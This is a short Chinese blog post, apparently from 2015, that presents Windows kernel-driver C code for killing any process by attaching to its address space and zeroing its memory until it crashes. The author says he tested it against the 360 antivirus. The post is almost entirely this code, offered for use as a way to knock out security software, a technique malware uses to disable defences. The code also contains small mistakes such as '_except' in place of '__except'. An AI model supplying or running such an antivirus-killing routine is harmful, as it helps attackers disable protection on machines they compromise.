windows内核中杀任意进程,可杀360!

废话不多说 先上代码。

static void DProKill(HANDLE pid){

PEPROCESS pe = DProPid2Eprocess(pid);

if (NULL == pe) {

return ;

}

KeAttachProcess(pe); //这里改为指定进程的 EPROCESS

 

for(int i=0x10000;i<0x20000000;i+=PAGE_SIZE) {

__try {

memset((addr_t)i,0,PAGE_SIZE); //把进程内存全部置零

}

_except(1) {

;

}

}

 

KeDetachProcess();

}

static PEPROCESS DProPid2Eprocess(HANDLE pid){

PEPROCESS ret = NULL;

if (NT_SUCCESS(PsLookupProcessByProcessId(pid,&ret))){

return ret;

}

return NULL;

}

 

 

原理就是到目标进程空间各种破坏内存,让其崩溃,亲测360可杀。

欢迎关注 windows驱动编程微信公众号,微信号:driverdevelop

posted on 2015-10-26 20:10  driverdevelop  阅读(4516)  评论(3编辑  收藏  举报

导航